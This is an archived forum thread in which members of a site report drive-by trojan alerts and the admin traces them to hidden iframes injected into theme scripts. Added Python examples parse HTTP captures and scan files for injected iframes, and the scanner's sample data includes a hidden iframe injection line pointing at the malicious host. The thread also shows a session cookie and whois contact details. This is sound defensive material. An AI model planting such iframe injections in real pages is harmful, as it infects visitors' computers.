Overunity.com Archives

News announcements and other topics => News => Topic started by: Ergo on January 07, 2008, 10:25:09 AM

Title: Trojan Alert
Post by: Ergo on January 07, 2008, 10:25:09 AM
WARNING!

My virus protection alerted against "s e x.exe" that was sneaked into my system on this site.
I used IE at the time being. I have now switched to Firefox.

Stefan, please check your AD suppliers for any suspicious Trojans.....
Title: Re: Trojan Alert
Post by: Carl. on January 07, 2008, 11:09:00 AM
I had the same experience today: several ads tried to install a trojan downloader. The antivirus caught it, but we should not have to be wary of OU's website, should we?

Stefan,

Please investigate your ad suppliers; they are playing dirty, or at least seem to be.
Title: Re: Trojan Alert
Post by: b0rg13 on January 07, 2008, 06:51:08 PM
Someone set up a poll and let's remove the damn ads... come on Stef, f***k the ads.
Title: Re: Trojan Alert
Post by: TheOne on January 07, 2008, 07:30:53 PM
At home I use Firefox with Adblock, all the crap is removed :) but at the office I have the same problem with IE; I got attacked by a trojan today too....

Also there is some problem with the size. I am configured to expand the view, but 50% of the time it's not expanded. It's frustrating; I reload the page sometimes 3-4 times to get it right, so much bandwidth lost!

And I get (User 'hartiberlin1' has exceeded the 'max_questions' resource (current value: 100000)) so many times, like right now when I want to post.....
Title: Re: Trojan Alert
Post by: huhh on January 07, 2008, 10:28:34 PM

  OMG.. You mean people are still using Internet Explorer.. l-o-l  good old internet newbies...lol
  ( no offense for people at work.) Although you should tell your company to use firefox for security.

  USE Mozilla FIREFOX with the plugins: NOscript and adblock.

==============================================================
If you feel Firefox seems slow at loading webpages, then do this tweak here:
It was a must do.... Although the latest firefox download may already have these set.
===============================================================

1.Type "about:config" into the address bar and hit return.
Scroll down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to a number like 30.
This means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it receives.
-----------------------------------------------------------------------------------------------------------------------------------------------



=========================================================================
Want more tweaks? How about a small registry tweak for faster webpage requesting:
=========================================================================
* If you don't know how to get to the registry, then you probably shouldn't. You've been warned, newbies.
* And be sure you're changing the correct entries. I will not be held liable for your silly mistakes.
* Create a system restore point if you feel you may make a silly mistake.
* Or write down the values that you're changing.
=========================================================================
Navigate to this registry entry and change the following settings:

For XP & 2K and VISTA
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider

For 98, 98SE & ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\ServiceProvider

On the right for ALL OS's change these entries: (ALL values are HEXADECIMAL)

Class - 1
DnsPriority - 1
HostsPriority - 1
LocalPriority - 1
NetbtPriority - 1

MY default settings for XP Home and Vista Home Premium 32bit were: (in hexadecimal)

Class - 8
DnsPriority - 7d0
HostsPriority - 1f4
LocalPriority - 1f3
NetbtPriority - 7d1

You are changing those five to 1. Can't be any simpler than that.
After that, you must re-start your pc for the changes to take effect.

=======================================================================
* Both of those tweaks made my dial-up a heck of a lot better in loading webpages.
   Those two tweaks are the first thing I do on a new pc. Tested on: XP Home and Vista Home Premium 32bit.
  I know my vista was ungodly slow for loading webpages... I even had to take the dial-up modem from my old xp pc.
  The factory modem was just junk..only connecting at 28800bps..lol .while my xp pc factory modem was pretty good.
------------------------------------------------------------------------------------------------------------------------------------------------

Title: Re: Trojan Alert
Post by: hartiberlin on January 09, 2008, 08:17:47 PM
Please let me know, which ad block did this ?
Please check the source code of the page and let me know.
As I only have text mode wap access right now, I can not see it myself.
Thanks.
Title: Re: Trojan Alert
Post by: Ergo on January 10, 2008, 10:05:33 AM
Sorry. There is no way to see where it gets access to one's system.
I use Symantec and the only clue I get is this warning window.
And right now the trojan is active on my computer. It keeps coming back by itself.
Symantec can't find and disinfect the source and I cannot find it either.
Very annoying.

Title: Re: Trojan Alert
Post by: turbo on January 10, 2008, 12:52:58 PM
people ,this forum is not safe anymore.

LEAVE WHILE YOU CAN IF NOT TOO LATE

make sure you use good anti virus/spyware protection.
I have just received this warning, and not even on my own computer.
This is very uncomfortable.




Title: Re: Trojan Alert
Post by: hartiberlin on January 10, 2008, 04:03:31 PM
Hi Marco,
I don't see this trojan horse
as I am back  now at home.
Please let me know,
which forum page exactly tried to load the trojan.
Also this IP address you listed is not my server,
so it must have been loaded from somewhere else.

I have just scanned my PC and it is clean.
Did this trojan only occur with IE or also with Firefox ?
Thanks.
Regards, Stefan.
Title: Re: Trojan Alert
Post by: Grumpy on January 10, 2008, 04:17:32 PM
I noticed the trojan on the "index page" - using IE

Yeah my stuff was out of date and it got me...shame on me.
Title: Re: Trojan Alert
Post by: hartiberlin on January 10, 2008, 04:25:04 PM
Hi Grumpy
do you still see it on the Homepage ?
I am using Firefox and all seems to work okay right
now without any Trojan.
Also there is no code in any page to this:
http://88.xxxx address that Marco posted...
Title: Re: Trojan Alert
Post by: Grumpy on January 10, 2008, 04:36:32 PM
Was on a different system when I encountered the trojan. 

My current system is much tougher. 

It may be opportunistic - infecting only the weak systems.
Title: Re: Trojan Alert
Post by: Pirate88179 on January 10, 2008, 05:45:59 PM
I picked up a Trojan yesterday off of the index page.  I am using ie and 2 firewalls and 2 active virus scanners.  One picked it up and warned me, and I told it not to run the script, but it got through and it took me like 4 hours to get rid of it.

Trojan: Java.dl.Open Conn.C

It was finally removed with PC Tools.  It hit me as the index page was loading. (which usually only takes like 1 second or so)

Has anyone else seen this one here too?

Bill
Title: Re: Trojan Alert
Post by: Tink on January 10, 2008, 06:16:42 PM
I am using Gutsy Gibbon Ubuntu with Firefox and ClamTk virusscanner, so far so good.
Are there Linux users having problems with this Trojan?
Title: Re: Trojan Alert
Post by: Pirate88179 on January 10, 2008, 07:05:27 PM
I have ubuntu here.
Title: Re: Trojan Alert
Post by: starcruiser on January 10, 2008, 07:15:45 PM
Stefan, The issue is with IE I believe, I got hit at work when loading the index page for the forums, at home I use FF and have not had any issues. Symantec caught the issue at work and fortunately I was able to get rid of it. Like Grumpy, my home system is hardened much better.
Title: Re: Trojan Alert
Post by: Pirate88179 on January 10, 2008, 07:20:07 PM
In my opinion, it should not matter what operating system or browser one is using...there should not be ANY trojans here!!!  They are obviously associated with one or more of the ads and this needs to be checked out.

Bill
Title: Re: Trojan Alert
Post by: hartiberlin on January 11, 2008, 11:25:01 AM
Hi All,
does your PC also want to make a connection
to the site:
orentraff.cn
??

I have now deactivated all ad blocks
and still every forum page wants to make a connection
to
orentraff.cn

So it must be coded somewhere into the php files,
which I did not find yet.
Can somebody help me to track this down please ?

The sourcecode does not show any iframe link to this site
nor does Firefox page information show anything...
Where does it hide ??
Title: Re: Trojan Alert
Post by: starcruiser on January 11, 2008, 12:47:26 PM
Stefan,

I bet your DNS service is inserting it, if it cannot be found in the source code of your web pages.

here is a link discussing this, the link is encrypted so you do not see it directly

http://www.globedomain.com/forums/viewtopic.php?f=3&t=2857
Title: Re: Trojan Alert
Post by: starcruiser on January 11, 2008, 12:50:14 PM
How many servers is your DB on? It appears that the offending site call comes and goes, could it be that a mirror of yours is infected?
Title: Re: Trojan Alert
Post by: starcruiser on January 11, 2008, 01:09:54 PM
more info on this malware gang, these are Russian hackers.

http://ddanchev.blogspot.com/2007/11/new-media-malware-gang.html

I was looking is this your domain or the hoster?

http://www.w3.org/1999/xhtml
Title: Re: Trojan Alert
Post by: turbo on January 11, 2008, 01:56:15 PM
it still connects to the site, but the alert is gone.

http://www.overunity.com/index.php

GET /index.php HTTP/1.1
Host: www.overunity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php?action=forum
Cookie: SMFCookie11=a%3A4%3A%7Bi%3A0%3Bs%3A4%3A%223834%22%3Bi%3A1%3Bs%3A40%3A%226ce775d84aada0cb081928ac878a4e2fbdb4104f%22%3Bi%3A2%3Bi%3A1374524675%3Bi%3A3%3Bi%3A0%3B%7D; __utma=140742380.1068190726.1198593065.1198932286.1198956070.6; __utmz=140742380.1194179925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=94f7b935b23a9dfc8e1b044760bbd93c
If-Modified-Since: Fri, 11 Jan 2008 18:52:03 GMT

HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.3
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Fri, 11 Jan 2008 18:52:26 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4081
Keep-Alive: timeout=10
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
----------------------------------------------------------
h ttp://orentraff.cn/tdsslam/index.php?out=1193100109

GET /tdsslam/index.php?out=1193100109 HTTP/1.1
Host: orentraff.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php

HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
----------------------------------------------------------
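
The capture above shows the useful clue: the request to orentraff.cn carries a Referer of http://www.overunity.com/index.php, so the forum's own page is what pulled it in. The following is an added example, not code from the thread or from overunity.com, that automates that check over a raw header capture: it parses request blocks and reports every fetch to a host outside the site whose Referer is one of the site's pages. The capture it runs on is constructed here, abridged and modelled on the one posted above (the script.js request is assumed, not captured).

```python
"""Find third-party fetches a page triggered, from a raw HTTP header capture.

Added example for the thread above; CAPTURE is a constructed, abridged sample
modelled on the posted headers, not a real log.
"""
from urllib.parse import urlsplit

CAPTURE = """\
GET /index.php HTTP/1.1
Host: www.overunity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Referer: http://www.overunity.com/index.php?action=forum

GET /Themes/default/script.js HTTP/1.1
Host: www.overunity.com
Referer: http://www.overunity.com/index.php

GET /tdsslam/index.php?out=1193100109 HTTP/1.1
Host: orentraff.cn
Referer: http://www.overunity.com/index.php
"""


def parse_requests(capture):
    """Split a capture into one dict per request: method, path, host, referer.

    Blocks are separated by a blank line; the first line is the request line,
    the rest are headers (matched case-insensitively, as HTTP requires).
    """
    requests = []
    for block in capture.strip().split("\n\n"):
        lines = block.strip().splitlines()
        method, path, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append({
            "method": method,
            "path": path,
            "host": headers.get("host", "").lower(),
            "referer": headers.get("referer", ""),
        })
    return requests


def third_party_loads(capture, site_hosts):
    """Return (host, path, referer) for every request to a host outside
    site_hosts that was referred by one of the site's own pages, i.e. a
    resource the page embedded (an ad, a script, or a hidden iframe)."""
    site_hosts = {h.lower() for h in site_hosts}
    hits = []
    for req in parse_requests(capture):
        referer_host = (urlsplit(req["referer"]).hostname or "").lower()
        if req["host"] not in site_hosts and referer_host in site_hosts:
            hits.append((req["host"], req["path"], req["referer"]))
    return hits


if __name__ == "__main__":
    for host, path, referer in third_party_loads(CAPTURE, {"www.overunity.com"}):
        print("%-20s %-40s referred by %s" % (host, path, referer))
```

Running it on a full capture from a proxy or Live HTTP Headers gives the list of external hosts to compare against the ad suppliers Stefan actually contracted; anything not on that list is a candidate for an injected iframe, and the Referer tells you which page to start searching.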

Title: Re: Trojan Alert
Post by: turbo on January 11, 2008, 02:11:03 PM
the 88.255.94.14 address is not the orentraff.cn address, this is 203.117.111.102
so the first address redirected to the second address.
the first seems to be a Turkish company and the second Australian.

-----------------------------------------

Domain Name: orentraff.cn ->> 203.117.111.102
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar: ????????????
Name Server:ns1.all-traff.com
Name Server:ns2.all-traff.com
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14



OrgName:    Asia Pacific Network Information Centre
OrgID:      APNIC
Address:    PO Box 2131
City:       Milton
StateProv:  QLD
PostalCode: 4064
Country:    AU

ReferralServer: whois://whois.apnic.net

NetRange:   202.0.0.0 - 203.255.255.255
CIDR:       202.0.0.0/7
NetName:    APNIC-CIDR-BLK
NetHandle:  NET-202-0-0-0-1
Parent:
NetType:    Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: DNS1.TELSTRA.NET
Comment:    This IP address range is not registered in the ARIN database.
Comment:    For details, refer to the APNIC Whois Database via
Comment:    WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment:    ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:    for the Asia Pacific region. APNIC does not operate networks
Comment:    using this IP address range and is not able to investigate
Comment:    spam or abuse reports relating to these addresses. For more
Comment:    help, refer to http://www.apnic.net/info/faq/abuse
Comment:
RegDate:    1994-04-05
Updated:    2005-05-20

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net

# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% [whois.apnic.net node-1]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      203.117.0.0 - 203.117.255.255
netname:      STARHUBINTERNET-SG
descr:        root
country:      SG
admin-c:      NS110-AP
tech-c:       NS110-AP
mnt-by:       MAINT-AS4657-AP
status:       ALLOCATED NON-PORTABLE
changed:      admin_ipdb@starhub.com 20070605
source:       APNIC

person:       NOC SHI
nic-hdl:      NS110-AP
e-mail:       noc@starhub.com
address:      19 TaiSeng Drive
address:      Singapore 535222
phone:        +65 6825 7878
fax-no:       +65 6821 6012
country:      SG
changed:      ipadmin@starhub.com 20060607
mnt-by:       MAINT-AS4657-AP
source:       APNIC

--------------------------------------------------------------

88.255.94.14

OrgName:    RIPE Network Coordination Centre
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv:
PostalCode: 1001EB
Country:    NL

ReferralServer: whois://whois.ripe.net:43

NetRange:   88.0.0.0 - 88.255.255.255
CIDR:       88.0.0.0/8
NetName:    88-RIPE
NetHandle:  NET-88-0-0-0-1
Parent:
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    2004-04-01
Updated:    2004-04-06

# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '88.255.94.0 - 88.255.94.255'

inetnum:        88.255.94.0 - 88.255.94.255
netname:        AbdAllah_Internet
descr:          AbdAllah Internet Hizmetleri
descr:          Etnografya Muze mevkii Kirazlik Mh. No:32 Rize
country:        tr
admin-c:        MAG87-RIPE
tech-c:         MAG87-RIPE
status:         assigned pa
mnt-by:         as9121-mnt
source:         RIPE # Filtered

person:         Mahmod AbdAllah el Gashmi
address:        AbdAllah Internet Hizmetleri
e-mail:         ipadmin@ahlen.biz
phone:          +90 543 3767728
remarks:        ------------------------------------------------------
remarks:        Routing and peering issues: ipadmin@ahlen.biz
remarks:        SPAM and Network security issues: abuse@ahlen.biz
remarks:        Customer support: ipadmin@ahlen.biz
remarks:        General information: ipadmin@ahlen.biz
remarks:        ------------------------------------------------------
nic-hdl:        MAG87-RIPE
mnt-by:         sistem-net-mnt
source:         RIPE # Filtered

% Information related to '88.255.0.0/16AS9121'

route:          88.255.0.0/16
descr:          TurkTelekom
origin:         AS9121
mnt-by:         AS9121-MNT
source:         RIPE # Filtered
Title: Re: Trojan Alert
Post by: turbo on January 11, 2008, 02:29:39 PM
i am using mozilla on my own computer and it works fine.
but i just tried to load the forum page in IE6 and it gave another trojan alert.
so IE6 users beware..

if you look into your msconfig you can switch it off if you are infected.
Title: Re: Trojan Alert
Post by: hartiberlin on January 11, 2008, 02:39:30 PM
Somehow somebody must have inserted an iframe into one file of my forum,
but I have not yet found the file,
where it is inserted.
If somebody familiar with the SMF software can help?
the index.php file calls many other PHP files
and I really must find this now..
Title: Re: Trojan Alert
Post by: hartiberlin on January 11, 2008, 02:52:59 PM
Okay, I
saw now via my FTP program that these
3 files were changed on the 7th of January:
sha1.js
script.js
fader.js

located in the
/Themes/default
directory and they each contain
an Iframe to the
orentraff.cn
site.

I must now check,
what the files normally do
and if I can just delete them
or if I have to edit out the
Iframe...
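
The three clues that surfaced in this thread (the page source shows no iframe, the theme scripts carry a changed FTP timestamp, and the injected line points at an outside host) can be turned into one scan. The script below is an added example, not code from the thread, from SMF or from overunity.com: it walks a web root, flags files containing iframe or document.write/unescape injection patterns, compares each file's SHA-256 against hashes from the pristine vendor archive, and flags anything modified after a cutoff date. It builds a constructed sample tree in a temporary directory; the injected line is modelled on the description above (a hidden iframe to orentraff.cn appended to a theme .js file), and the "vendor archive" hashes are computed from the clean copies here rather than read from a real SMF download.

```python
"""Scan a web root for injected iframes and tampered theme files.

Added example; the sample tree and the appended payload are constructed here.
"""
import datetime
import hashlib
import os
import re
import tempfile

# Constructs legitimate theme scripts rarely contain: an <iframe> literal,
# document.write() of a script/iframe or of an unescape()d blob, or a long
# %XX-encoded string handed to unescape().
INJECT_RE = re.compile(
    r"<iframe[^>]*>"
    r"|document\.write\s*\(\s*(?:unescape|['\"]\s*<(?:script|iframe))"
    r"|unescape\s*\(\s*['\"](?:%[0-9a-fA-F]{2}){8,}",
    re.IGNORECASE,
)
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)
SCAN_EXT = (".js", ".php", ".html", ".htm")
CUTOFF = datetime.datetime(2008, 1, 6)  # files touched after this are suspect


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, own_hosts, known_good=None, changed_since=None):
    """Return [{'file': rel_path, 'reasons': [...]}] for files that look tampered.

    own_hosts:     hostnames the site legitimately references (never flagged).
    known_good:    {rel_path: sha256} computed from the pristine vendor archive.
    changed_since: datetime; files with a later mtime are flagged (the cue that
                   gave the game away in the FTP listing above).
    """
    own = {h.lower() for h in own_hosts}
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            reasons = []
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")  # never raises on odd bytes
            matches = list(INJECT_RE.finditer(text))
            if matches:
                hosts = set()
                for m in matches:  # hosts named near each hit
                    hosts |= {h.lower() for h in HOST_RE.findall(text[m.start():m.start() + 300])}
                reasons.append("injection pattern at offset(s) %s -> %s"
                               % ([m.start() for m in matches], sorted(hosts - own)))
            if known_good and rel in known_good and sha256_file(path) != known_good[rel]:
                reasons.append("sha256 differs from vendor archive copy")
            if changed_since is not None:
                mtime = datetime.datetime.fromtimestamp(os.path.getmtime(path))
                if mtime > changed_since:
                    reasons.append("modified %s, after cutoff" % mtime.date())
            if reasons:
                findings.append({"file": rel, "reasons": reasons})
    return sorted(findings, key=lambda f: f["file"])


# Constructed sample contents (not the real SMF files).
CLEAN_SCRIPT = "function smf_scriptUrl() { return 'index.php'; }\n"
CLEAN_FADER = "function fader() {}\n"
INJECTED_TAIL = ("document.write('<iframe src=\"http://orentraff.cn/tdsslam/index.php\" "
                 "width=0 height=0 style=\"visibility:hidden\"></iframe>');\n")


def build_sample_tree():
    """Write a tiny SMF-like tree to a temp dir; return (root, known_good)."""
    root = tempfile.mkdtemp(prefix="smf-scan-")
    os.makedirs(os.path.join(root, "Themes", "default"))
    files = {
        "Themes/default/script.js": CLEAN_SCRIPT + INJECTED_TAIL,  # tampered
        "Themes/default/fader.js": CLEAN_FADER,                     # untouched
        "index.php": "<?php require_once('SSI.php');\n",          # no vendor hash
    }
    stale = datetime.datetime(2007, 12, 1).timestamp()
    for rel, body in files.items():
        path = os.path.join(root, rel)
        with open(path, "wb") as fh:
            fh.write(body.encode())
        os.utime(path, (stale, stale))
    touched = datetime.datetime(2008, 1, 7, 3, 0).timestamp()  # the 7 Jan timestamp
    tampered = os.path.join(root, "Themes", "default", "script.js")
    os.utime(tampered, (touched, touched))
    known_good = {  # what hashing the clean archive copies would give
        "Themes/default/script.js": hashlib.sha256(CLEAN_SCRIPT.encode()).hexdigest(),
        "Themes/default/fader.js": hashlib.sha256(CLEAN_FADER.encode()).hexdigest(),
    }
    return root, known_good


def demo():
    root, known_good = build_sample_tree()
    return scan_tree(root, ["www.overunity.com"], known_good, CUTOFF)


if __name__ == "__main__":
    for finding in demo():
        print(finding["file"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

The hash comparison is the decisive test: a file that differs from the vendor copy is wrong regardless of what pattern the attacker used, while the regex catches injections in files no archive covers (custom themes, edited templates). Timestamps are the weakest signal, since an attacker with FTP access can reset them, so treat a clean mtime as no evidence at all.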
Title: Re: Trojan Alert
Post by: starcruiser on January 11, 2008, 02:59:43 PM
edit out the iframe call, the code was probably inserted at or near the end of the file
Title: Re: Trojan Alert
Post by: turbo on January 11, 2008, 03:03:50 PM
can't you just restore/overwrite it all except for the database??
the default theme worked fine for me you know :)
glad you found it...i hope it takes out the bugs we had lately

M.
Title: Re: Trojan Alert
Post by: hallo on January 11, 2008, 03:26:56 PM
Yes, I replaced the files from the original
SMF forum software archive and changed now the FTP passwords,
so this should all be resolved now.

I will post this now to the SMF community to warn other
SMF forum software admins.

Regards, Stefan.
Title: Re: Trojan Alert
Post by: hansvonlieven on January 11, 2008, 03:57:43 PM
Back with a vengeance

See attached screenshot

Hans
Title: Re: Trojan Alert
Post by: Pirate88179 on January 11, 2008, 04:06:22 PM
Hans:

I just got that too a few minutes ago.  Then, I could not get on the site at all.  But now, it seems fine. I am now running Mozilla Firefox ALL the time.  Chinese hackers are probably attacking this site.

Bill
Title: Re: Trojan Alert
Post by: hansvonlieven on January 11, 2008, 04:32:59 PM
Still the same shit here

Hans
Title: Re: Trojan Alert
Post by: hansvonlieven on January 11, 2008, 04:39:37 PM
As of this minute it has returned to normal again

Hans
Title: Re: Trojan Alert
Post by: starcruiser on January 11, 2008, 04:39:48 PM
I got that and when I reloaded it cleared
Title: Re: Trojan Alert
Post by: hartiberlin on January 11, 2008, 04:39:53 PM
My hoster had a DNS problem a few minutes ago.
Now it is fixed again.

I hope we have resolved now this issue.
Title: Re: Trojan Alert
Post by: TheOne on January 11, 2008, 04:57:30 PM
I can no longer expand the screen, it's hard to navigate without it! The option no longer exists?

EDITED:

Ok now it work, I needed to navigate in the profile section to re-enable it by magic.
Title: Re: Trojan Alert
Post by: hansvonlieven on January 11, 2008, 05:16:38 PM
Quote from: hartiberlin on January 11, 2008, 04:39:53 PM
My hoster had a DNS problem a few minutes ago.
Now it is fixed again.

I hope we have resolved now this issue.

Let us hope so.

Thank you Stefan for the hard work put in by you to get the thing going again. I am sure all of us appreciate your effort.

Greetings

Hans von Lieven
Title: Re: Trojan Alert
Post by: Pirate88179 on January 11, 2008, 05:33:43 PM
Yes Stefan, thanks for fixing this. A good thing came out of this for me, as I had forgotten how easy and fun Firefox is to use, and today I made it my default browser.  I also beefed up my antivirus software with some additional downloads, which is never a bad thing to do.

Bill
Title: Re: Trojan Alert
Post by: wattsup on January 12, 2008, 01:31:30 AM
Shit ..... I got it too.

I was at the damn US patent site that only really works with IE, and without thinking I browsed here instead of with my regular Firefox.

First I removed Internet Explorer from Windows XP. FINI IE TABARNAC.

Did some heavy duty sword fighting with the bastard and found this out.

From what I can tell, it uploaded onto my computer from the OU index page to:

C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Temporary Internet Files\Content.IE5\C1QFG567\images2[1]\00000063.js
Virus name: VBS/Psyme

It probably activated itself before my virus scanner could catch it. It was updated yesterday.

Stefan, you may try to do a search for this file on the server 00000063.js

My virus checker also deleted this one.
C:\WINDOWS\system32\drivers\smtpdrv.sys
Virus name: Generic dx
smtpdrv.sys Trojan deleted

Spy-Agent.bv.dldr

Trojan Discovered : 03/27/2007,Risk: Low-Profiled

vil.nai.com/vil/content/v_141846.htm - 26k - Cached

The "Spy-Agent.bv.dldr" trojan is designed to download Spy-Agent.bv files from a remote site.

Upon execution, the trojan drops the following files:

    * %Windir%\System32\drivers\ip6fw.sys (Spy-Agent.bv.dldr)
    (Cannot yet delete. It pops back seconds later)
    * %Windir%\System32\drivers\runtime.sys (Spy-Agent.bv.dldr)
    (Manually Deleted)
    * %Windir%\System32\5_exception.nls (Spy-Agent.bv.dldr)
    (Manually Deleted)

(Where %Windir% is the Windows folder, e.g. C:\Windows)

It adds the following registry keys:

Remove these.

    * HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Runtime
      "ImagePath" =  \??\%Windir%\System32\drivers\runtime.sys
      "ErrorControl" = 1
      "Start" = 3
      "Type" = 1
     
    * HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Runtime "ImagePath"
      "ImagePath" =  \??\%Windir%\System32\drivers\runtime.sys
      "ErrorControl" = 1
      "Start" = 3
      "Type" = 1

Open       C:\WINDOWS\regedit.exe       
and remove the above registry keys; BE CAREFUL WITH REGEDIT!!!!!!

The trojan injects a code into the process "IExplore.exe". The injected code attempts to download files from the following remote site.

    * 66.246.252.[removed]

I found the file here;

C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Temporary Internet Files\\Content.IES\C1QFG567\216.195.55[1].HTML

Cannot yet delete this file.

You won't be able to see the above directory with Windows Explorer. You will need ztreewin. I have attached the file ZTW.ZIP. Create a directory as C:\ZTW, download this file there, then unzip it. Link to the ZTW.EXE from your desktop. This is the best low-level drive browser out there. Very powerful and indispensable when hunting these rats.

Symptoms - Existence of mentioned files and registry keys.

Method of Infection -

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, etc.

If you did the above changes, then before rebooting you have to disable Windows Restore so it does not re-install itself from a backup.

WindowsXP

Disabling the System Restore Utility (Windows XP Users)

   1. Right click the My Computer icon on the Desktop and click on Properties.
   2. Click on the System Restore tab.
   3. Put a check mark next to 'Turn off System Restore on All Drives'.
   4. Click the 'OK' button.
   5. You will be prompted to restart the computer. Click Yes.


Now I am getting an Explorer.exe error

AppName: explorer.exe    AppVer: 6.0.2900.2180    ModName: winhttp.dll
ModVer: 5.1.2600.2180    Offset: 00018fa0

I moved C:\windows\system32\winhttp.dll to a newly created directory that I named "aaa-hold" in case I needed it.

There are also some tmp files that cannot be deleted.

My computer crashed a few times.

Now I will re-boot with my Windows 98 start up diskette and remove those stray files under Dos.

What a total waste of time.
Title: Re: Trojan Alert
Post by: Paul-R on January 12, 2008, 10:15:19 AM
This board is useless with dial up, and has a signal/noise
ratio of around 200:1. No wonder we have bandwidth issues.

And now this.
At least this sort of thing never happened with YahooGroups.
If you want to serve best the new energy community, Stefan,
you need to do some hard thinking about the future.
Paul.
Title: Re: Trojan Alert
Post by: Red on January 13, 2008, 08:17:07 AM
wattsup

If that thing is re-inserting itself you have a root kit working on your system.

It loads into the Master Boot record and inserts code that runs when windows starts.
You need a root kit remover to find it.

try http://www.gmer.net/index.php

It should locate it..

You may need to reinstall the MBR by starting up windows CD and using the tools dialog ask it to "fixmbr"

It should re-write the list...

Noobs stop using IE or Windows...!

News source that uses English and not geek
http://news.bbc.co.uk/2/hi/technology/default.stm

http://news.bbc.co.uk/2/hi/technology/6035455.stm


For the admin of this site...

Hackers can use third party websites to inject the bad stuff.
They use an iframe with zero dimensions, i.e. it's not visible on the page, but it's there; an iframe is like running a website inside a website within the HTML in your browser. They manipulate IE easily and use simple tricks like cancel buttons that are not....

I have had several run code in VM and they all worked on IE and very well. Inserted a code as a cookie or as an image / download set to auto run. IE does this!
Once on the machine they buzz a website, bought and paid for by CC theft, they then download more stuff and your PC becomes a Zombie..

So

